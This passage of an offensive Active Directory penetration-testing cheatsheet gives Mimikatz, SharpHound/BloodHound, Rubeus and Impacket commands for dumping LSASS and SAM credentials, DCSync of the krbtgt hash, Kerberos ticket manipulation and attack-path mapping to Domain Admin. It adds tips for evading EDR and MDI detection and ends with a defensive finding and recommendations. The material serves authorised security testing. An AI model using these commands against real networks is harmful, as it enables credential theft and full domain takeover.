SharpHound: collect all AD data β SharpHound.exe -c All --zipfilename loot.zip
BloodHound: import zip, mark owned, find shortest path to DA
π― Operational Context
Use when: AD foothold obtained and lateral movement or privilege escalation requires specialized tooling β Mimikatz for credential extraction, Rubeus for Kerberos manipulation, Impacket for remote operations from Linux, BloodHound/SharpHound for attack path mapping.
Think Dumber First: Before any tool: whoami /priv (need SeDebugPrivilege for Mimikatz), klist (see existing tickets), nxc smb [DC] -u [USER] -p [PASS] (confirm access). Match the tool to the current task β Rubeus for Kerberos-only, Mimikatz for in-memory credentials, Impacket for Linux-to-Windows ops.
Skip when: EDR is active β default Mimikatz and SharpHound signatures are well-known; use nxc/impacket alternatives that generate less detection noise.
β‘ Tactical Cheatsheet
Mimikatz β In-Memory Credential Extraction
Command
Tactical Outcome
privilege::debug
Enable SeDebugPrivilege for LSASS access
sekurlsa::logonpasswords
Dump NTLM hashes + plaintext creds from LSASS
sekurlsa::tickets /export
Export all Kerberos tickets from LSASS to .kirbi files
lsadump::sam
Dump SAM database hashes (requires SYSTEM)
lsadump::dcsync /user:krbtgt /domain:[DOMAIN]
DCSync to get krbtgt hash (requires replication rights)
# Full collection β most complete, most noisySharpHound.exe -c All --zipfilename loot.zip --outputdirectory C:\Temp\# Stealth collection β DC only, no workstation session queriesSharpHound.exe -c DCOnly,LoggedOn --zipfilename loot.zip# Target specific domainSharpHound.exe -c All -d [DOMAIN] --domaincontroller [DC_FQDN] --zipfilename loot.zip# After import, key BloodHound GUI actions:# 1. Analysis β Find Shortest Paths to Domain Admins# 2. Analysis β Find Kerberoastable Users with most privileges# 3. Analysis β Find AS-REP Roastable Users# 4. Mark owned users/computers right-click β Mark as Owned# 5. Node β Reachable High Value Targets from owned node
π οΈ Troubleshooting & Edge Cases
Problem
Cause
Fix
Mimikatz privilege::debug fails
Not admin or PPL active
Elevate to SYSTEM first; for PPL use !+ to load driver bypass
Rubeus kerberoast returns 0 hashes
No SPN accounts or wrong DC
Verify: impacket-GetUserSPNs [DOMAIN]/[USER]:[PASS] -dc-ip [DC] from Linux
impacket-psexec access denied
ADMIN$ not writable or blocked
Try wmiexec or smbexec; confirm nxc smb [TARGET] shows Pwn3d!
DCSync blocked by MDI
Replication traffic monitored
Use VSS shadow copy method instead; less detectable
SharpHound detected by AV
Known binary signature
Use bloodhound-python from Linux or nxc --bloodhound; no binary on target
BloodHound import fails
Version mismatch (CE vs Legacy)
Match SharpHound version to BloodHound version; CE needs SharpHound 2.x
Ticket from Rubeus wonβt inject
Already have conflicting ticket
klist purge first, then Rubeus.exe ptt /ticket:[BASE64]
impacket clock skew error
Time not synced with DC
ntpdate -u [DC_IP] then retry Kerberos operations
π Reporting Trigger
Finding Title: AD Attack Tool Execution β Credential Extraction and Kerberos Abuse
Impact: Use of Mimikatz, Rubeus, and Impacket suite demonstrates that an attacker with initial AD access can systematically extract all domain credentials, manipulate Kerberos tickets, and achieve remote code execution across all Windows hosts β escalating a single compromised account to complete domain ownership.
Root Cause: Multiple compounding AD security deficiencies: no Credential Guard (allows LSASS dump), weak service account passwords (Kerberoasting), no MDI monitoring (DCSync undetected), and NTLM acceptance enabling Pass-the-Hash.
Recommendation: Deploy Credential Guard on all endpoints. Implement MDI to detect Mimikatz, DCSync, and Rubeus patterns. Use gMSA for all service accounts. Enforce MFA for privileged accounts. Harden LSASS with PPL (RunAsPPL). Disable NTLMv1 and monitor NTLMv2 usage.